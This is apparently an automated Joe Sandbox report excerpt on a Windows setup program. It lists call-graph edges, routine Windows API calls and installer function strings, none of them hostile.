76588->76591 76593 6c4a5553 76588->76593 76594 6c4a827a 66 API calls 76588->76594 76590->76528 76592 6c4a811c 97 API calls 76591->76592 76591->76593 76592->76593 76593->76587 76594->76591 76596->76533 76601 6c4a9076 76597->76601 76598 6c4a907a 76600 6c4a907f 76598->76600 76615 6c4ab570 66 API calls __getptd_noexit 76598->76615 76600->76453 76601->76598 76601->76600 76603 6c4a90bd 76601->76603 76603->76600 76617 6c4ab570 66 API calls __getptd_noexit 76603->76617 76605 6c4a9096 76616 6c4ab514 11 API calls __wctomb_s_l 76605->76616 76607 6c4a7f48 CreateFileW 76606->76607 76608 6c4a7f2f 76606->76608 76610 6c4a7f62 76607->76610 76618 6c4a7e95 GetModuleHandleW GetProcAddress CreateFileW 76608->76618 76611 6c4a7f6d 76610->76611 76619 6c4a7f08 GetLastError 76610->76619 76611->76447 76612 6c4a7f46 76612->76610 76614->76447 76615->76605 76616->76600 76617->76605 76618->76612 76619->76611 76620->76465 76621 6c490eac 76624 6c4911ba 76621->76624 76625 6c4911c9 76624->76625 76626 6c4911cc WriteFile 76624->76626 76625->76626 76627 6c4911e2 76626->76627 76628 6c4911e7 FlushFileBuffers 76626->76628 76633 6c4a7f08 GetLastError 76627->76633 76630 6c490ec1 76628->76630 76631 6c4911f5 76628->76631 76634 6c4a7f08 GetLastError 76631->76634 76633->76628 76634->76630 76635 32a24 76682 33db0 76635->76682 76637 32a30 GetStartupInfoW 76638 32a44 HeapSetInformation 76637->76638 76641 32a4f 76637->76641 76638->76641 76640 32a9d 76642 32aa8 76640->76642 76707 329f6 66 API calls 3 library calls 76640->76707 76683 33d83 HeapCreate 76641->76683 76708 33c03 86 API calls 4 library calls 76642->76708 76645 32aae 76646 32ab2 76645->76646 76647 32aba __RTC_Initialize 76645->76647 76709 329f6 66 API calls 3 library calls 76646->76709 76684 33642 73 API calls __calloc_crt 76647->76684 76649 32ab9 76649->76647 76651 32ac7 76652 32ad3 GetCommandLineW 76651->76652 76653 32acb 76651->76653 76685 335e5 GetEnvironmentStringsW 76652->76685 76710 32f1c 66 API calls 3 library calls 76653->76710 76657 32ae3 76711 
33532 67 API calls 2 library calls 76657->76711 76659 32aed 76660 32af1 76659->76660 76661 32af9 76659->76661 76712 32f1c 66 API calls 3 library calls 76660->76712 76691 332f6 76661->76691 76665 32afe 76666 32b02 76665->76666 76667 32b0a 76665->76667 76713 32f1c 66 API calls 3 library calls 76666->76713 76705 32cdd 77 API calls 4 library calls 76667->76705 76671 32b11 76672 32b16 76671->76672 76673 32b1d __wwincmdln 76671->76673 76714 32f1c 66 API calls 3 library calls 76672->76714 76675 32b1c 76673->76675 76706 32915 HeapSetInformation Run 76673->76706 76675->76673 76677 32b3e 76678 32b4c 76677->76678 76715 32ebe 66 API calls _doexit 76677->76715 76716 32ef4 66 API calls _doexit 76678->76716 76681 32b51 _raise 76682->76637 76683->76640 76684->76651 76686 335f6 76685->76686 76687 335fa 76685->76687 76686->76657 76717 34f38 76687->76717 76689 33623 FreeEnvironmentStringsW 76689->76657 76690 3361c _memmove 76690->76689 76692 3330e _wcslen 76691->76692 76696 33306 76691->76696 76748 34f82 76692->76748 76694 33388 76755 34ef9 66 API calls 2 library calls 76694->76755 76696->76665 76697 34f82 __calloc_crt 66 API calls 76699 33332 _wcslen 76697->76699 76698 333ae 76756 34ef9 66 API calls 2 library calls 76698->76756 76699->76694 76699->76696 76699->76697 76699->76698 76702 333c5 76699->76702 76754 34e4d 66 API calls _raise 76699->76754 76757 346ec 10 API calls __call_reportfault 76702->76757 76704 333d1 76704->76665 76705->76671 76706->76677 76707->76642 76708->76645 76709->76649 76711->76659 76715->76678 76716->76681 76719 34f41 76717->76719 76720 34f77 76719->76720 76721 34f58 Sleep 76719->76721 76723 36115 76719->76723 76720->76690 76722 34f6d 76721->76722 76722->76719 76722->76720 76724 36192 76723->76724 76732 36123 76723->76732 76746 34771 _DecodePointerInternal 76724->76746 76726 36198 76747 347e5 66 API calls __getptd_noexit 76726->76747 76729 36151 RtlAllocateHeap 76730 3618a 76729->76730 76729->76732 76730->76719 76732->76729 76733 3617e 76732->76733 76734 
3612e 76732->76734 76738 3617c 76732->76738 76743 34771 _DecodePointerInternal 76732->76743 76744 347e5 66 API calls __getptd_noexit 76733->76744 76734->76732 76740 3311e 66 API calls 2 library calls 76734->76740 76741 32f6a 66 API calls 6 library calls 76734->76741 76742 32c43 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76734->76742 76745 347e5 66 API calls __getptd_noexit 76738->76745 76740->76734 76741->76734 76743->76732 76744->76738 76745->76730 76746->76726 76747->76730 76750 34f8b 76748->76750 76751 34fc8 76750->76751 76752 34fa9 Sleep 76750->76752 76758 361ae 76750->76758 76751->76699 76753 34fbe 76752->76753 76753->76750 76753->76751 76754->76699 76755->76696 76756->76696 76757->76704 76759 361d5 76758->76759 76760 361ba 76758->76760 76763 361e8 RtlAllocateHeap 76759->76763 76765 3620f 76759->76765 76768 34771 _DecodePointerInternal 76759->76768 76760->76759 76761 361c6 76760->76761 76767 347e5 66 API calls __getptd_noexit 76761->76767 76763->76759 76763->76765 76764 361cb 76764->76750 76765->76750 76767->76764 76768->76759 76769 6c94830c 76776 6c94f821 76769->76776 76832 6c9476a7 76776->76832 76833 6c9476b3 __EH_prolog3 76832->76833 76866 6c96c0aa 76833->76866 76836 6c947716 76886 6c9177af RegOpenKeyExW 76836->76886 76840 6c96c0aa ctype 77 API calls 76841 6c94772f GetModuleHandleW 76840->76841 76843 6c947752 GetProcAddress 76841->76843 76844 6c94776f SetUnhandledExceptionFilter GetCommandLineW 76841->76844 76843->76844 76845 6c947769 SetThreadStackGuarantee 76843->76845 76894 6c913e77 76844->76894 76845->76844 76847 6c94778a 77006 6c959293 GetCommandLineW 76847->77006 76853 6c9477c5 77074 6c9141d6 76853->77074 76868 6c96c0b4 76866->76868 76867 6c96bfb3 _malloc 66 API calls 76867->76868 76868->76867 76869 6c947704 76868->76869 76874 6c96c0d0 std::exception::exception 76868->76874 77082 6c971247 _DecodePointerInternal 76868->77082 76869->76836 76878 6c917c6e 76869->76878 76871 6c96c10e 77084 6c9713ee 66 API calls 
std::exception::operator= 76871->77084 76873 6c96c118 77085 6c9714aa 76873->77085 76874->76871 77083 6c96b1d7 76 API calls __cinit 76874->77083 76877 6c96c129 76879 6c917c7a __EH_prolog3 76878->76879 77088 6c968e54 76879->77088 76882 6c968e54 ctype KiUserExceptionDispatcher 76883 6c917cba 76882->76883 77092 6c917ce8 76883->77092 76885 6c917cd9 ctype 76885->76836 76887 6c9177f2 RegCreateKeyExW 76886->76887 76888 6c91785b RegCloseKey 76886->76888 76887->76888 76889 6c91780f 76887->76889 76890 6c96b091 ___strgtold12_l 5 API calls 76888->76890 77314 6c91787b 76889->77314 76891 6c917874 76890->76891 76891->76840 76893 6c91781a RegSetValueExW RegSetValueExW 76893->76888 76895 6c913e83 __EH_prolog3 76894->76895 76896 6c94833e ctype 110 API calls 76895->76896 76897 6c913e9f 76896->76897 76898 6c91419a ctype 76897->76898 76899 6c94833e ctype 110 API calls 76897->76899 76898->76847 76900 6c913eca 76899->76900 77390 6c949067 76900->77390 76902 6c913ed6 76903 6c968f0e ctype RtlFreeHeap 76902->76903 76904 6c913ee5 76903->76904 76905 6c94833e ctype 110 API calls 76904->76905 76906 6c913ef3 76905->76906 76907 6c949067 ctype 71 API calls 76906->76907 76908 6c913eff 76907->76908 76909 6c968f0e ctype RtlFreeHeap 76908->76909 76910 6c913f0e 76909->76910 76911 6c94833e ctype 110 API calls 76910->76911 76912 6c913f1c 76911->76912 76913 6c949067 ctype 71 API calls 76912->76913 76914 6c913f28 76913->76914 76915 6c968f0e ctype RtlFreeHeap 76914->76915 76916 6c913f37 76915->76916 76917 6c94833e ctype 110 API calls 76916->76917 76918 6c913f45 76917->76918 76919 6c949067 ctype 71 API calls 76918->76919 76920 6c913f51 76919->76920 76921 6c968f0e ctype RtlFreeHeap 76920->76921 76922 6c913f60 76921->76922 76923 6c94833e ctype 110 API calls 76922->76923 76924 6c913f6e 76923->76924 76925 6c949067 ctype 71 API calls 76924->76925 76926 6c913f7a 76925->76926 76927 6c968f0e ctype RtlFreeHeap 76926->76927 76928 6c913f89 76927->76928 76929 6c94833e ctype 110 API calls 76928->76929 76930 6c913f97 
76929->76930 76931 6c949067 ctype 71 API calls 76930->76931 76932 6c913fa3 76931->76932 76933 6c968f0e ctype RtlFreeHeap 76932->76933 76934 6c913fb2 76933->76934 76935 6c94833e ctype 110 API calls 76934->76935 76936 6c913fc0 76935->76936 76937 6c949067 ctype 71 API calls 76936->76937 76938 6c913fcc 76937->76938 76939 6c968f0e ctype RtlFreeHeap 76938->76939 76940 6c913fdb 76939->76940 76941 6c94833e ctype 110 API calls 76940->76941 76942 6c913fe9 76941->76942 76943 6c949067 ctype 71 API calls 76942->76943 76944 6c913ff5 76943->76944 76945 6c968f0e ctype RtlFreeHeap 76944->76945 76946 6c914004 76945->76946 76947 6c94833e ctype 110 API calls 76946->76947 76948 6c914012 76947->76948 76949 6c949067 ctype 71 API calls 76948->76949 76950 6c91401e 76949->76950 76951 6c968f0e ctype RtlFreeHeap 76950->76951 76952 6c91402d 76951->76952 76953 6c94833e ctype 110 API calls 76952->76953 76954 6c91403b 76953->76954 76955 6c949067 ctype 71 API calls 76954->76955 76956 6c914047 76955->76956 76957 6c968f0e ctype RtlFreeHeap 76956->76957 76958 6c914056 76957->76958 76959 6c94833e ctype 110 API calls 76958->76959 76960 6c914064 76959->76960 76961 6c949067 ctype 71 API calls 76960->76961 76962 6c914070 76961->76962 76963 6c968f0e ctype RtlFreeHeap 76962->76963 76964 6c91407f 76963->76964 76965 6c94833e ctype 110 API calls 76964->76965 76966 6c91408d 76965->76966 76967 6c949067 ctype 71 API calls 76966->76967 76968 6c914099 76967->76968 76969 6c968f0e ctype RtlFreeHeap 76968->76969 76970 6c9140a8 76969->76970 76971 6c94833e ctype 110 API calls 76970->76971 76972 6c9140b6 76971->76972 76973 6c949067 ctype 71 API calls 76972->76973 76974 6c9140c2 76973->76974 76975 6c968f0e ctype RtlFreeHeap 76974->76975 76976 6c9140d1 76975->76976 76977 6c94833e ctype 110 API calls 76976->76977 76978 6c9140df 76977->76978 76979 6c949067 ctype 71 API calls 76978->76979 76980 6c9140eb 76979->76980 76981 6c968f0e ctype RtlFreeHeap 76980->76981 76982 6c9140fa 76981->76982 76983 6c94833e ctype 110 API calls 
76982->76983 76984 6c914108 76983->76984 76985 6c949067 ctype 71 API calls 76984->76985 76986 6c914114 76985->76986 76987 6c968f0e ctype RtlFreeHeap 76986->76987 76988 6c914123 76987->76988 76989 6c94833e ctype 110 API calls 76988->76989 76990 6c914131 76989->76990 76991 6c949067 ctype 71 API calls 76990->76991 76992 6c91413d 76991->76992 76993 6c968f0e ctype RtlFreeHeap 76992->76993 76994 6c91414c 76993->76994 76995 6c94833e ctype 110 API calls 76994->76995 76996 6c91415a 76995->76996 76997 6c949067 ctype 71 API calls 76996->76997 76998 6c914166 76997->76998 76999 6c968f0e ctype RtlFreeHeap 76998->76999 77000 6c914175 76999->77000 77001 6c94833e ctype 110 API calls 77000->77001 77002 6c914183 77001->77002 77003 6c949067 ctype 71 API calls 77002->77003 77004 6c91418f 77003->77004 77005 6c968f0e ctype RtlFreeHeap 77004->77005 77005->76898 77007 6c913e77 ctype 114 API calls 77006->77007 77008 6c9592d0 77007->77008 77398 6c914486 77008->77398 77011 6c968f0e ctype RtlFreeHeap 77012 6c9592f4 77011->77012 77018 6c9592f8 77012->77018 77401 6c91423c 111 API calls ctype 77012->77401 77014 6c959320 77016 6c913a16 ctype 111 API calls 77014->77016 77014->77018 77015 6c9141a9 ctype 67 API calls 77017 6c947793 77015->77017 77016->77018 77019 6c91420c 77017->77019 77018->77015 77020 6c9141d6 111 API calls 77019->77020 77021 6c914216 77020->77021 77022 6c91422a 77021->77022 77023 6c913a16 ctype 111 API calls 77021->77023 77024 6c913a16 77022->77024 77023->77022 77025 6c913a22 __EH_prolog3 77024->77025 77026 6c94833e ctype 110 API calls 77025->77026 77027 6c913a36 77026->77027 77482 6c9488d1 77027->77482 77030 6c968eab std::bad_exception::bad_exception 67 API calls 77031 6c913a50 77030->77031 77032 6c9488d1 ctype 102 API calls 77031->77032 77033 6c913a62 77032->77033 77489 6c948cd5 77033->77489 77035 6c913a73 77495 6c948c7a 77035->77495 77037 6c913a8f ctype 77038 6c948cd5 ctype 101 API calls 77037->77038 77044 6c913ad6 ctype 77037->77044 77039 6c913abc 77038->77039 77040 6c948c7a 
ctype 101 API calls 77039->77040 77040->77044 77041 6c913b0c 77043 6c913b1f 77041->77043 77045 6c968f0e ctype RtlFreeHeap 77041->77045 77042 6c968f0e ctype RtlFreeHeap 77042->77041 77046 6c913b32 77043->77046 77047 6c968f0e ctype RtlFreeHeap 77043->77047 77044->77041 77044->77042 77045->77043 77048 6c913b4c 77046->77048 77049 6c968f0e ctype RtlFreeHeap 77046->77049 77047->77046 77050 6c913b52 77048->77050 77051 6c948cd5 ctype 101 API calls 77048->77051 77049->77048 77055 6c968f0e ctype RtlFreeHeap 77050->77055 77052 6c913b6b 77051->77052 77501 6c948a98 77052->77501 77057 6c913c74 77055->77057 77059 6c968f0e ctype RtlFreeHeap 77057->77059 77061 6c913c7f ctype 77059->77061 77060 6c913bf2 77064 6c913c13 77060->77064 77066 6c968f0e ctype RtlFreeHeap 77060->77066 77061->76853 77062 6c948cd5 ctype 101 API calls 77063 6c913bb6 77062->77063 77065 6c948a98 ctype 67 API calls 77063->77065 77067 6c913c26 77064->77067 77068 6c968f0e ctype RtlFreeHeap 77064->77068 77070 6c913bda 77065->77070 77066->77064 77069 6c913c39 77067->77069 77071 6c968f0e ctype RtlFreeHeap 77067->77071 77068->77067 77069->77050 77073 6c968f0e ctype RtlFreeHeap 77069->77073 77072 6c9485bc ctype KiUserExceptionDispatcher 77070->77072 77071->77069 77072->77060 77073->77050 77075 6c913a16 ctype 111 API calls 77074->77075 77076 6c9141e9 77075->77076 77077 6c9141fa 77076->77077 77078 6c913a16 ctype 111 API calls 77076->77078 77079 6c9141a9 77077->77079 77078->77077 77584 6c95657a 77079->77584 77082->76868 77083->76871 77084->76873 77086 6c9714d3 77085->77086 77087 6c9714df KiUserExceptionDispatcher 77085->77087 77086->77087 77087->76877 77089 6c968e58 77088->77089 77091 6c917cad 77088->77091 77116 6c968e8c 77089->77116 77091->76882 77093 6c917cf4 __EH_prolog3 77092->77093 77119 6c94833e 77093->77119 77095 6c917d16 77127 6c917ee4 77095->77127 77097 6c917d25 77135 6c968f0e 77097->77135 77101 6c917d3d ctype 77102 6c968f0e ctype RtlFreeHeap 77101->77102 77103 6c917d5c 77102->77103 77104 6c915dd0 113 API calls 
77103->77104 77105 6c917d65 ctype 77104->77105 77106 6c968f0e ctype RtlFreeHeap 77105->77106 77107 6c917d8a ctype 77106->77107 77153 6c915485 77107->77153 77109 6c917daf ctype 77110 6c968f0e ctype RtlFreeHeap 77109->77110 77111 6c917dd4 77110->77111 77163 6c91575e 77111->77163 77113 6c917ddd ctype 77114 6c968f0e ctype RtlFreeHeap 77113->77114 77115 6c917e02 ctype 77114->77115 77115->76885 77117 6c9714aa __CxxThrowException@8 KiUserExceptionDispatcher 77116->77117 77118 6c968ea5 77117->77118 77120 6c94834a __EH_prolog3 77119->77120 77121 6c968e54 ctype KiUserExceptionDispatcher 77120->77121 77122 6c948357 77121->77122 77168 6c94fe8a 77122->77168 77126 6c948371 ctype 77126->77095 77128 6c917ef0 __EH_prolog3 77127->77128 77129 6c968eab std::bad_exception::bad_exception 67 API calls 77128->77129 77130 6c917f06 77129->77130 77239 6c9484b9 77130->77239 77133 6c968f0e ctype RtlFreeHeap 77134 6c917f26 ctype 77133->77134 77134->77097 77136 6c917d34 77135->77136 77137 6c968f1d 77135->77137 77139 6c915dd0 77136->77139 77248 6c9754f2 77137->77248 77140 6c915ddc __EH_prolog3 77139->77140 77251 6c915c6f 77140->77251 77142 6c915df0 77143 6c968eab std::bad_exception::bad_exception 67 API calls 77142->77143 77144 6c915e01 77143->77144 77261 6c915e41 77144->77261 77146 6c915e13 77147 6c9484b9 ctype 101 API calls 77146->77147 77148 6c915e1c 77147->77148 77149 6c968f0e ctype RtlFreeHeap 77148->77149 77150 6c915e27 77149->77150 77151 6c968f0e ctype RtlFreeHeap 77150->77151 77152 6c915e32 ctype 77151->77152 77152->77101 77296 6c976e1a 77153->77296 77155 6c915491 GetModuleHandleW 77156 6c9154b3 GetProcAddress 77155->77156 77157 6c9154a6 77155->77157 77158 6c9154c5 77156->77158 77159 6c9154cb GetNativeSystemInfo 77156->77159 77160 6c94833e ctype 110 API calls 77157->77160 77158->77159 77297 6c914ea3 77159->77297 77162 6c9154b1 ctype 77160->77162 77162->77109 77308 6c915727 GetModuleHandleW 77163->77308 77167 6c91578e 77167->77113 77169 6c94fe96 77168->77169 77170 6c948364 77168->77170 
77169->77170 77176 6c948b33 110 API calls ctype 77169->77176 77170->77126 77172 6c968c76 77170->77172 77173 6c968c84 ctype 77172->77173 77177 6c968bdc 77173->77177 77176->77170 77178 6c968bf0 77177->77178 77179 6c968be9 77177->77179 77181 6c968c02 77178->77181 77182 6c968e8c ctype KiUserExceptionDispatcher 77178->77182 77198 6c968b95 KiUserExceptionDispatcher RtlFreeHeap ctype 77179->77198 77192 6c968d91 77181->77192 77182->77181 77185 6c968c31 77188 6c96b1f3 _memcpy_s 66 API calls 77185->77188 77186 6c968c1d 77199 6c96b6ef 66 API calls 2 library calls 77186->77199 77189 6c968c2f 77188->77189 77200 6c968dcd 77189->77200 77191 6c968bee 77191->77126 77193 6c968da6 77192->77193 77194 6c968d9c 77192->77194 77196 6c968c14 77193->77196 77214 6c968d3a 77193->77214 77195 6c968e8c ctype KiUserExceptionDispatcher 77194->77195 77195->77193 77196->77185 77196->77186 77198->77191 77199->77189 77201 6c968dd1 77200->77201 77202 6c968dd8 77201->77202 77203 6c968e8c ctype KiUserExceptionDispatcher 77201->77203 77202->77191 77204 6c968dee 77203->77204 77206 6c968e8c ctype KiUserExceptionDispatcher 77204->77206 77207 6c968e27 77204->77207 77237 6c96b4c9 66 API calls _vwprintf 77204->77237 77206->77204 77208 6c968d91 ctype 70 API calls 77207->77208 77209 6c968e2d 77208->77209 77238 6c96b446 97 API calls swprintf 77209->77238 77211 6c968e3d 77212 6c968dcd ctype 101 API calls 77211->77212 77213 6c968e49 77212->77213 77213->77191 77215 6c968d4b 77214->77215 77216 6c968d53 77215->77216 77219 6c968d5c 77215->77219 77221 6c968c9e 77216->77221 77218 6c968d5a 77218->77196 77219->77218 77231 6c968d0b 77219->77231 77222 6c968cba 77221->77222 77230 6c97563e RtlAllocateHeap 77222->77230 77223 6c968cc5 77224 6c968cd0 77223->77224 77225 6c9677cf std::bad_exception::bad_exception KiUserExceptionDispatcher 77223->77225 77226 6c96b1f3 _memcpy_s 66 API calls 77224->77226 77225->77224 77227 6c968ce9 77226->77227 77228 6c968f0e ctype RtlFreeHeap 77227->77228 77229 6c968cfa 77228->77229 77229->77218 
77230->77223 77232 6c968d17 77231->77232 77233 6c968d25 77231->77233 77232->77233 77236 6c9756a7 RtlReAllocateHeap 77232->77236 77234 6c9677cf std::bad_exception::bad_exception KiUserExceptionDispatcher 77233->77234 77235 6c968d2f 77233->77235 77234->77235 77235->77218 77236->77233 77237->77204 77238->77211 77240 6c9484c8 77239->77240 77247 6c917f1e 77239->77247 77241 6c9484ea 77240->77241 77243 6c9484d5 77240->77243 77242 6c968bdc ctype 101 API calls 77241->77242 77242->77247 77244 6c968eab std::bad_exception::bad_exception 67 API calls 77243->77244 77245 6c9484da 77244->77245 77246 6c968f0e ctype RtlFreeHeap 77245->77246 77246->77247 77247->77133 77249 6c9754fd RtlFreeHeap 77248->77249 77250 6c97550b 77248->77250 77249->77250 77250->77136 77253 6c915c7b __EH_prolog3 77251->77253 77252 6c915cb4 77255 6c915cc6 GetModuleFileNameW 77252->77255 77256 6c968e8c ctype KiUserExceptionDispatcher 77252->77256 77253->77252 77254 6c968d3a ctype 70 API calls 77253->77254 77254->77252 77257 6c94833e ctype 110 API calls 77255->77257 77256->77255 77258 6c915ce8 77257->77258 77259 6c968f0e ctype RtlFreeHeap 77258->77259 77260 6c915cf0 ctype 77259->77260 77260->77142 77262 6c915e4d __EH_prolog3 77261->77262 77263 6c94833e ctype 110 API calls 77262->77263 77264 6c915e66 77263->77264 77265 6c968eab std::bad_exception::bad_exception 67 API calls 77264->77265 77266 6c915e77 PathFindFileNameW 77265->77266 77267 6c915e8e PathFindExtensionW 77266->77267 77269 6c915eab 77267->77269 77282 6c9489f0 77269->77282 77274 6c9484b9 ctype 101 API calls 77275 6c915ee2 77274->77275 77276 6c968f0e ctype RtlFreeHeap 77275->77276 77277 6c915eed 77276->77277 77278 6c968f0e ctype RtlFreeHeap 77277->77278 77279 6c915ef8 77278->77279 77280 6c968f0e ctype RtlFreeHeap 77279->77280 77281 6c915f03 ctype 77280->77281 77281->77146 77283 6c948a15 ctype 67 API calls 77282->77283 77284 6c915ec4 77283->77284 77285 6c948a15 77284->77285 77286 6c948a2a 77285->77286 77287 6c948a6d 77286->77287 77290 6c948a3d 
77286->77290 77288 6c968e8c ctype KiUserExceptionDispatcher 77287->77288 77289 6c948a77 ctype 77288->77289 77295 6c94feb7 67 API calls 3 library calls 77289->77295 77290->77289 77291 6c948a5b 77290->77291 77292 6c968eab std::bad_exception::bad_exception 67 API calls 77291->77292 77294 6c915ed9 77292->77294 77294->77274 77295->77294 77296->77155 77302 6c914fd5 77297->77302 77300 6c94833e ctype 110 API calls 77301 6c914f56 77300->77301 77301->77162 77303 6c914ffd 77302->77303 77306 6c915085 GetSystemMetrics 77303->77306 77307 6c915001 77303->77307 77304 6c96b091 ___strgtold12_l 5 API calls 77305 6c914eb2 77304->77305 77305->77300 77306->77307 77307->77304 77309 6c915755 77308->77309 77310 6c91573b GetProcAddress 77308->77310 77313 6c915847 110 API calls 2 library calls 77309->77313 77311 6c91574b 77310->77311 77312 6c91574e GetSystemInfo 77310->77312 77311->77312 77312->77309 77313->77167 77315 6c917887 __EH_prolog3 77314->77315 77316 6c91789e RegOpenKeyExW 77315->77316 77320 6c917938 ctype 77315->77320 77317 6c9178c2 RegQueryValueExW RegCloseKey 77316->77317 77318 6c917908 SHGetFolderPathW 77316->77318 77317->77318 77321 6c9178ef GetFileAttributesW 77317->77321 77319 6c91791d 77318->77319 77325 6c91793e 77318->77325 77337 6c96b8ad 77319->77337 77320->76893 77321->77318 77323 6c917900 77321->77323 77323->77320 77346 6c915d3f 77325->77346 77326 6c917930 GetFileAttributesW 77326->77320 77326->77325 77328 6c91795e 77359 6c948e8b 77328->77359 77331 6c968f0e ctype RtlFreeHeap 77332 6c91797c 77331->77332 77365 6c96b927 77332->77365 77335 6c917991 77336 6c968f0e ctype RtlFreeHeap 77335->77336 77336->77320 77338 6c96b8c2 77337->77338 77340 6c96b8bb 77337->77340 77374 6c96bd29 66 API calls __getptd_noexit 77338->77374 77340->77338 77343 6c96b8f7 77340->77343 77342 6c917929 77342->77325 77342->77326 77343->77342 77376 6c96bd29 66 API calls __getptd_noexit 77343->77376 77345 6c96b8c7 77375 6c96ecf4 11 API calls __cftof2_l 77345->77375 77348 6c915d4b __EH_prolog3 77346->77348 
77347 6c915d8c GetModuleFileNameW 77377 6c968afc 77347->77377 77348->77347 77349 6c968d3a ctype 70 API calls 77348->77349 77351 6c915d89 77349->77351 77351->77347 77353 6c94833e ctype 110 API calls 77354 6c915dad 77353->77354 77382 6c948f73 77354->77382 77357 6c968f0e ctype RtlFreeHeap 77358 6c915dc0 ctype 77357->77358 77358->77328 77360 6c948eb0 PathCombineW 77359->77360 77361 6c948ea9 77359->77361 77363 6c968afc ctype KiUserExceptionDispatcher 77360->77363 77362 6c968d3a ctype 70 API calls 77361->77362 77362->77360 77364 6c917971 77363->77364 77364->77331 77366 6c96b935 77365->77366 77367 6c96b93c 77365->77367 77366->77367 77369 6c96b95d 77366->77369 77387 6c96bd29 66 API calls __getptd_noexit 77367->77387 77371 6c917986 GetFileAttributesW 77369->77371 77389 6c96bd29 66 API calls __getptd_noexit 77369->77389 77371->77335 77373 6c96b941 77388 6c96ecf4 11 API calls __cftof2_l 77373->77388 77374->77345 77375->77342 77376->77345 77378 6c968b01 _wcsnlen 77377->77378 77379 6c915da4 77378->77379 77380 6c968e8c ctype KiUserExceptionDispatcher 77378->77380 77379->77353 77381 6c968b34 77380->77381 77383 6c968d91 ctype 70 API calls 77382->77383 77384 6c948f83 PathRemoveFileSpecW 77383->77384 77385 6c968afc ctype KiUserExceptionDispatcher 77384->77385 77386 6c915db8 77385->77386 77386->77357 77387->77373 77388->77371 77389->77373 77393 6c949073 __EH_prolog3 77390->77393 77391 6c949094 77395 6c9490db ctype 77391->77395 77396 6c96be92 __recalloc 70 API calls 77391->77396 77392 6c968eab std::bad_exception::bad_exception 67 API calls 77392->77395 77393->77391 77394 6c968e8c ctype KiUserExceptionDispatcher 77393->77394 77397 6c9490b5 77393->77397 77394->77391 77395->76902 77396->77397 77397->77392 77397->77395 77402 6c913c8f 77398->77402 77400 6c9144a0 77400->77011 77401->77014 77403 6c913c9b __EH_prolog3 77402->77403 77404 6c94833e ctype 110 API calls 77403->77404 77405 6c913cb7 77404->77405 77406 6c968e54 ctype KiUserExceptionDispatcher 77405->77406 77407 6c913cca 77406->77407 
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C4A652C
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C49E93B: __EH_prolog3.LIBCMT ref: 6C49E942
                                                              • CoInitialize.OLE32(00000000), ref: 6C4A6596
                                                                • Part of subcall function 6C4A697A: __EH_prolog3.LIBCMT ref: 6C4A6981
                                                                • Part of subcall function 6C4A697A: CoCreateInstance.OLE32(6C487980,00000000,00000017,6C487970,?,?,00000068,6C4A65A6,?,?,?,?,6C4A2A30,?,00000000,?), ref: 6C4A69AC
                                                              • CoCreateInstance.OLE32(6C487930,00000000,00000017,6C487970,00000001,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?), ref: 6C4A65BE
                                                              • CoUninitialize.OLE32(00000001,?,00000000,00000000,?,?,succeeded,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000), ref: 6C4A66DE
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4A6773
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CreateInstance$Exception@8H_prolog3_catchInitializeThrowUninitialize
                                                              • String ID: exiting function/method$Entering Function$IronMan::UiDataT<class IronMan::CCmdLineSwitches>::CreateUiDataT$UIInfo.xml$Xml Document load failure$succeeded$threw exception
                                                              • API String ID: 4239111664-3845428783
                                                              • Opcode ID: 35ae017666f58d2c700bd049e1dc80175592b0c380a7a557c8d8cf133575ae7f
                                                              • Instruction ID: 2286dd2adc037507fd87bd9a26e3cc70cf17123fd9552721d2d1b713f6398889
                                                              • Opcode Fuzzy Hash: 35ae017666f58d2c700bd049e1dc80175592b0c380a7a557c8d8cf133575ae7f
                                                              • Instruction Fuzzy Hash: F0814971901248EFDB00DFE8C888EDEBBB8AF19318F148559E514EB755CB35DA46CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9476AE
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C94F845,?), ref: 6C947748
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C947758
                                                              • SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C94776D
                                                              • SetUnhandledExceptionFilter.KERNEL32(6C95416A), ref: 6C947774
                                                              • GetCommandLineW.KERNEL32 ref: 6C94777A
                                                                • Part of subcall function 6C917C6E: __EH_prolog3.LIBCMT ref: 6C917C75
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
